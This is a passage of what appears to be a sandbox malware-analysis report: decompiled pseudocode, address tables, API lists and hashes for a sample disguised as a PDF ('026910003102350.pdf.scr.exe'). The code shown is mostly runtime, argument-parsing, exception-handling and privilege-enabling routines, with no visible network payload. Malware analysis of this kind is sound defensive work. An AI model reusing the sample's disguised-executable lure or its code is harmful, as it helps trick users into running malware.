						_push(0x456);
						L38:
						_push(E00CCE617());
						_push( *_t57);
						L19:
						_t45 = E00CDB776();
						L11:
						return _t45;
					}
					_t62 = _t33 - 0x16;
					if(_t62 > 0) {
						__eflags = _t33 - 0x38;
						if(__eflags > 0) {
							_t46 = _t33 - 0x39;
							__eflags = _t46;
							if(_t46 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t47 = _t46 - 1;
							__eflags = _t47;
							if(_t47 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t48 = _t47 - 1;
							__eflags = _t48;
							if(_t48 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t51 = _t48 - 9;
							__eflags = _t51;
							if(_t51 == 0) {
								_push(0x343);
								goto L38;
							}
							_t33 = _t51 - 1;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t33 = _t33 - 0x17;
							__eflags = _t33 - 0xb;
							if(_t33 <= 0xb) {
								switch( *((intOrPtr*)(_t33 * 4 +  &M00CD190E))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L64;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00CCE617(0xc8) =  &_v516;
										__eax = E00CC4092( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00CDB776( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t62 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00CCE617();
							L7:
							_push(0);
							L8:
							return E00CDB776();
						}
						if(_t33 <= 0x15) {
							switch( *((intOrPtr*)(_t33 * 4 +  &M00CD18B6))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00CDAECD();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00CCE617());
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L64;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00CCE617(0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00CCE617());
									_push( *_t57);
									goto L8;
							}
						}
					}
				}
				L64:
				return _t33;
			}













                                                    0x00cd1606
                                                    0x00cd160c
                                                    0x00cd160e
                                                    0x00cd1611
                                                    0x00cd1614
                                                    0x00cd183f
                                                    0x00cd1844
                                                    0x00cd1846
                                                    0x00cd184b
                                                    0x00cd184f
                                                    0x00cd188c
                                                    0x00cd1851
                                                    0x00cd186b
                                                    0x00cd1870
                                                    0x00000000
                                                    0x00cd18ab
                                                    0x00cd161a
                                                    0x00cd161a
                                                    0x00cd1835
                                                    0x00cd175e
                                                    0x00cd1763
                                                    0x00cd1764
                                                    0x00cd16a1
                                                    0x00cd16a1
                                                    0x00cd166a
                                                    0x00000000
                                                    0x00cd166a
                                                    0x00cd1620
                                                    0x00cd1623
                                                    0x00cd1723
                                                    0x00cd1726
                                                    0x00cd17e6
                                                    0x00cd17e6
                                                    0x00cd17e9
                                                    0x00cd182b
                                                    0x00000000
                                                    0x00cd182b
                                                    0x00cd17eb
                                                    0x00cd17eb
                                                    0x00cd17ee
                                                    0x00cd1824
                                                    0x00000000
                                                    0x00cd1824
                                                    0x00cd17f0
                                                    0x00cd17f0
                                                    0x00cd17f3
                                                    0x00cd1817
                                                    0x00cd181a
                                                    0x00000000
                                                    0x00cd181a
                                                    0x00cd17f5
                                                    0x00cd17f5
                                                    0x00cd17f8
                                                    0x00cd180d
                                                    0x00000000
                                                    0x00cd180d
                                                    0x00cd17fa
                                                    0x00cd17fa
                                                    0x00cd17fd
                                                    0x00cd1803
                                                    0x00000000
                                                    0x00cd1803
                                                    0x00cd172c
                                                    0x00cd172c
                                                    0x00cd17df
                                                    0x00000000
                                                    0x00cd17df
                                                    0x00cd1732
                                                    0x00cd1735
                                                    0x00cd1738
                                                    0x00cd173e
                                                    0x00000000
                                                    0x00cd1745
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd174f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1759
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd176b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd176f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1773
                                                    0x00cd1776
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd177d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1784
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd178b
                                                    0x00cd178e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1798
                                                    0x00cd179b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd17b0
                                                    0x00cd17bc
                                                    0x00cd17c1
                                                    0x00cd17c4
                                                    0x00cd17ca
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd173e
                                                    0x00cd1738
                                                    0x00cd1629
                                                    0x00cd1629
                                                    0x00cd171a
                                                    0x00cd171c
                                                    0x00cd16be
                                                    0x00cd16be
                                                    0x00cd1646
                                                    0x00cd1646
                                                    0x00cd1648
                                                    0x00000000
                                                    0x00cd164d
                                                    0x00cd1632
                                                    0x00cd1638
                                                    0x00000000
                                                    0x00cd1655
                                                    0x00cd1657
                                                    0x00cd165c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd163f
                                                    0x00cd1641
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1663
                                                    0x00cd1665
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1670
                                                    0x00cd1673
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd167f
                                                    0x00cd1682
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1686
                                                    0x00cd1689
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd168d
                                                    0x00cd1690
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1697
                                                    0x00cd1699
                                                    0x00cd169e
                                                    0x00cd169f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16a9
                                                    0x00cd16ac
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16b0
                                                    0x00cd16b3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16b7
                                                    0x00cd16b9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16c6
                                                    0x00cd16c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16cf
                                                    0x00cd16d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16d9
                                                    0x00cd16dc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16e3
                                                    0x00cd16e6
                                                    0x00cd16ee
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1703
                                                    0x00cd1706
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd170d
                                                    0x00cd1710
                                                    0x00cd1675
                                                    0x00cd167a
                                                    0x00cd167b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1638
                                                    0x00cd1632
                                                    0x00cd1623
                                                    0x00cd18b2
                                                    0x00cd18b2

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _swprintf
                                                    • String ID: %ls$%s: %s
                                                    • API String ID: 589789837-2259941744
                                                    • Opcode ID: 43f7794fd90260a8f5aac0ff9ae18c7d50870539cc93efda003e34e0514f3455
                                                    • Instruction ID: c5e3a6082581030df05f3c06fb84e5ce5b04b4cf127bc6fbaaa8cbc8ddf14a7e
                                                    • Opcode Fuzzy Hash: 43f7794fd90260a8f5aac0ff9ae18c7d50870539cc93efda003e34e0514f3455
                                                    • Instruction Fuzzy Hash: C4515B31288304F6F6216A918D46F367265EB05B00F2D450BFF96A46F1D9B2E912F71B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00CE7F6E(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00CEBB30(_t52);
					GetModuleFileNameA(0, 0xd22128, 0x104);
					_t49 =  *0xd226d8; // 0x33833a8
					 *0xd226e0 = 0xd22128;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xd22128;
					}
					_v8 = 0;
					_v16 = 0;
					E00CE8092(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00CE8207(_v8, _v16, 1);
					if(_t64 != 0) {
						E00CE8092(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00CEB643(_t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xd226cc = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xd226d0 = _t59;
									L16:
									E00CE8DCC(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xd226cc = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xd226d0 = _t43;
						goto L10;
					} else {
						_t44 = E00CE91A8();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00CE8DCC(_t64);
						return _t50;
					}
				} else {
					_t45 = E00CE91A8();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00CE9087();
					return _t65;
				}
			}


















                                                    0x00ce7f6e
                                                    0x00ce7f7b
                                                    0x00ce7f9b
                                                    0x00ce7fae
                                                    0x00ce7fb4
                                                    0x00ce7fba
                                                    0x00ce7fc2
                                                    0x00ce7fc9
                                                    0x00ce7fc9
                                                    0x00ce7fce
                                                    0x00ce7fd5
                                                    0x00ce7fdc
                                                    0x00ce7fee
                                                    0x00ce7ff5
                                                    0x00ce8014
                                                    0x00ce8020
                                                    0x00ce803b
                                                    0x00ce803e
                                                    0x00ce8045
                                                    0x00ce804b
                                                    0x00ce8052
                                                    0x00ce8055
                                                    0x00ce8057
                                                    0x00ce805b
                                                    0x00ce8065
                                                    0x00ce8065
                                                    0x00ce8067
                                                    0x00ce806d
                                                    0x00ce8070
                                                    0x00ce8072
                                                    0x00ce8078
                                                    0x00ce8079
                                                    0x00ce807f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce805d
                                                    0x00ce805d
                                                    0x00ce805d
                                                    0x00ce8060
                                                    0x00ce8061
                                                    0x00000000
                                                    0x00ce805d
                                                    0x00ce804d
                                                    0x00000000
                                                    0x00ce804d
                                                    0x00ce8026
                                                    0x00ce802b
                                                    0x00ce802d
                                                    0x00ce802f
                                                    0x00000000
                                                    0x00ce7ff7
                                                    0x00ce7ff7
                                                    0x00ce7ffc
                                                    0x00ce7ffe
                                                    0x00ce7fff
                                                    0x00ce8034
                                                    0x00ce8034
                                                    0x00ce8082
                                                    0x00ce8083
                                                    0x00000000
                                                    0x00ce808c
                                                    0x00ce7f83
                                                    0x00ce7f83
                                                    0x00ce7f8a
                                                    0x00ce7f8b
                                                    0x00ce7f8d
                                                    0x00000000
                                                    0x00ce7f92

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\026910003102350.pdf.scr.exe,00000104), ref: 00CE7FAE
                                                    • _free.LIBCMT ref: 00CE8079
                                                    • _free.LIBCMT ref: 00CE8083
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                    • API String ID: 2506810119-423393661
                                                    • Opcode ID: a648f229f2009d9f3fae267422e72e443b61075093e6ab5d635c4321346a60dc
                                                    • Instruction ID: 387d927f480fabf4b5090ee5ed7348c62a5aef3065347b6474192da343cc20bc
                                                    • Opcode Fuzzy Hash: a648f229f2009d9f3fae267422e72e443b61075093e6ab5d635c4321346a60dc
                                                    • Instruction Fuzzy Hash: 9631BF71A00298AFCB21DF9ADC80DAEBBBCEF94310F104166F91897211DB718E49DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E00CE31D6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed int _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				_t132 =  *_t96 - 0x80000003;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00CE2AEC(_t96, __ecx, __edx, _t113, _t121, _t132);
					_t133 =  *((intOrPtr*)(_t75 + 8));
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00CE2AEC(_t96, __ecx, __edx, 0, _t121, _t133) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00CE0961(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00CE0894(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00CE2DB1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00CE8D24(_t96, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					__eflags = _t78;
					if(_t78 == 0) {
						L41:
						_t80 = 1;
						__eflags = 1;
					} else {
						_t101 = _t78 + 8;
						__eflags =  *_t101;
						if( *_t101 == 0) {
							goto L41;
						} else {
							__eflags =  *_t111 & 0x00000080;
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0) {
								L23:
								_t97 = _t116[4];
								_t123 = 0;
								__eflags = _t78 - _t97;
								if(_t78 == _t97) {
									L33:
									__eflags =  *_t116 & 0x00000002;
									if(( *_t116 & 0x00000002) == 0) {
										L35:
										_t81 = _a8;
										__eflags =  *_t81 & 0x00000001;
										if(( *_t81 & 0x00000001) == 0) {
											L37:
											__eflags =  *_t81 & 0x00000002;
											if(( *_t81 & 0x00000002) == 0) {
												L39:
												_t123 = 1;
												__eflags = 1;
											} else {
												__eflags =  *_t111 & 0x00000002;
												if(( *_t111 & 0x00000002) != 0) {
													goto L39;
												}
											}
										} else {
											__eflags =  *_t111 & 0x00000001;
											if(( *_t111 & 0x00000001) != 0) {
												goto L37;
											}
										}
									} else {
										__eflags =  *_t111 & 0x00000008;
										if(( *_t111 & 0x00000008) != 0) {
											goto L35;
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										__eflags = _t98 -  *_t82;
										if(_t98 !=  *_t82) {
											break;
										}
										__eflags = _t98;
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												__eflags = _t99;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										__eflags = _t83;
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									__eflags = _t83;
									goto L31;
								}
							} else {
								__eflags =  *_t116 & 0x00000010;
								if(( *_t116 & 0x00000010) != 0) {
									goto L41;
								} else {
									goto L23;
								}
							}
						}
					}
					L42:
					return _t80;
				}
			}















































                                                    0x00ce31d6
                                                    0x00ce31d6
                                                    0x00ce31dd
                                                    0x00ce31e0
                                                    0x00ce31e6
                                                    0x00ce3305
                                                    0x00ce31ec
                                                    0x00ce31ec
                                                    0x00ce31ed
                                                    0x00ce31ee
                                                    0x00ce31f5
                                                    0x00ce31f8
                                                    0x00ce31fb
                                                    0x00ce3201
                                                    0x00ce320b
                                                    0x00ce3230
                                                    0x00ce3235
                                                    0x00ce323a
                                                    0x00ce3301
                                                    0x00000000
                                                    0x00ce3302
                                                    0x00ce323a
                                                    0x00ce320b
                                                    0x00ce3240
                                                    0x00ce3243
                                                    0x00ce3246
                                                    0x00ce324c
                                                    0x00ce3252
                                                    0x00ce3264
                                                    0x00ce3269
                                                    0x00ce326c
                                                    0x00ce326f
                                                    0x00ce3272
                                                    0x00ce3275
                                                    0x00ce327b
                                                    0x00ce3281
                                                    0x00ce3284
                                                    0x00ce3287
                                                    0x00ce3296
                                                    0x00ce3297
                                                    0x00ce3297
                                                    0x00ce329c
                                                    0x00ce32af
                                                    0x00ce32b1
                                                    0x00ce32b6
                                                    0x00ce32c1
                                                    0x00ce32c3
                                                    0x00ce32c5
                                                    0x00ce32e1
                                                    0x00ce32e6
                                                    0x00ce32e9
                                                    0x00ce32e9
                                                    0x00ce32c1
                                                    0x00ce32b6
                                                    0x00ce32ef
                                                    0x00ce32f0
                                                    0x00ce32f3
                                                    0x00ce32f6
                                                    0x00ce32f9
                                                    0x00ce32fc
                                                    0x00ce3287
                                                    0x00000000
                                                    0x00ce327b
                                                    0x00ce3306
                                                    0x00ce330b
                                                    0x00ce330f
                                                    0x00ce3312
                                                    0x00ce3313
                                                    0x00ce3314
                                                    0x00ce3315
                                                    0x00ce3318
                                                    0x00ce331a
                                                    0x00ce3392
                                                    0x00ce3394
                                                    0x00ce3394
                                                    0x00ce331c
                                                    0x00ce331c
                                                    0x00ce331f
                                                    0x00ce3322
                                                    0x00000000
                                                    0x00ce3324
                                                    0x00ce3324
                                                    0x00ce3327
                                                    0x00ce332a
                                                    0x00ce3331
                                                    0x00ce3331
                                                    0x00ce3334
                                                    0x00ce3336
                                                    0x00ce3338
                                                    0x00ce336a
                                                    0x00ce336a
                                                    0x00ce336d
                                                    0x00ce3374
                                                    0x00ce3374
                                                    0x00ce3377
                                                    0x00ce337a
                                                    0x00ce3381
                                                    0x00ce3381
                                                    0x00ce3384
                                                    0x00ce338b
                                                    0x00ce338d
                                                    0x00ce338d
                                                    0x00ce3386
                                                    0x00ce3386
                                                    0x00ce3389
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3389
                                                    0x00ce337c
                                                    0x00ce337c
                                                    0x00ce337f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce337f
                                                    0x00ce336f
                                                    0x00ce336f
                                                    0x00ce3372
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3372
                                                    0x00ce338e
                                                    0x00ce333a
                                                    0x00ce333a
                                                    0x00ce333a
                                                    0x00ce333d
                                                    0x00ce333d
                                                    0x00ce333f
                                                    0x00ce3341
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3343
                                                    0x00ce3345
                                                    0x00ce3359
                                                    0x00ce3359
                                                    0x00ce3347
                                                    0x00ce3347
                                                    0x00ce334a
                                                    0x00ce334d
                                                    0x00000000
                                                    0x00ce334f
                                                    0x00ce334f
                                                    0x00ce3352
                                                    0x00ce3355
                                                    0x00ce3357
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce3357
                                                    0x00ce334d
                                                    0x00ce3362
                                                    0x00ce3362
                                                    0x00ce3364
                                                    0x00000000
                                                    0x00ce3366
                                                    0x00ce3366
                                                    0x00ce3366
                                                    0x00000000
                                                    0x00ce3364
                                                    0x00ce335d
                                                    0x00ce335f
                                                    0x00ce335f
                                                    0x00000000
                                                    0x00ce335f
                                                    0x00ce332c
                                                    0x00ce332c
                                                    0x00ce332f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce332f
                                                    0x00ce332a
                                                    0x00ce3322
                                                    0x00ce3395
                                                    0x00ce3399
                                                    0x00ce3399

                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CE31FB
                                                    • _abort.LIBCMT ref: 00CE3306
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer_abort
                                                    • String ID: MOC$RCC
                                                    • API String ID: 948111806-2084237596
                                                    • Opcode ID: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                    • Instruction ID: 411578fa3d324b8ffdd3ec01a599fbd5efc0feb43266d1edc032b23fd1ff5ed7
                                                    • Opcode Fuzzy Hash: b1c0ce3a4a2a0c8f64c5ba89a154094c8c2bb985970091b68c34f8ba82e84911
                                                    • Instruction Fuzzy Hash: 41418C71900189AFCF16DF96CC85AEEBBB5FF08304F148099FA1467262D335AA51DB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 66%
                                                    			E00CC7401(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t31;
				long _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t49;
				void* _t62;
				void* _t63;
				void* _t66;

				_t62 = __esi;
				_t48 = __ebx;
				E00CDEB78(0xcf27b7, _t66);
				E00CDEC50(0x1060);
				 *((intOrPtr*)(_t66 - 0x20)) = 0;
				 *((intOrPtr*)(_t66 - 0x1c)) = 0;
				 *((intOrPtr*)(_t66 - 0x18)) = 0;
				 *((intOrPtr*)(_t66 - 0x14)) = 0;
				 *((char*)(_t66 - 0x10)) = 0;
				_t59 =  *((intOrPtr*)(_t66 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t66 - 4)) = 0;
				_push(_t66 - 0x20);
				if(E00CC3BBA( *((intOrPtr*)(_t66 + 8))) != 0) {
					if( *0xd01022 == 0) {
						if(E00CC7A9C(L"SeSecurityPrivilege") != 0) {
							 *0xd01021 = 1;
						}
						E00CC7A9C(L"SeRestorePrivilege");
						 *0xd01022 = 1;
					}
					_push(_t62);
					_t63 = 7;
					if( *0xd01021 != 0) {
						_t63 = 0xf;
					}
					_push(_t48);
					_t49 =  *((intOrPtr*)(_t66 - 0x20));
					_push(_t49);
					_push(_t63);
					_push( *((intOrPtr*)(_t66 + 0xc)));
					if( *0xd23000() == 0) {
						if(E00CCBB03( *((intOrPtr*)(_t66 + 0xc)), _t66 - 0x106c, 0x800) == 0) {
							L10:
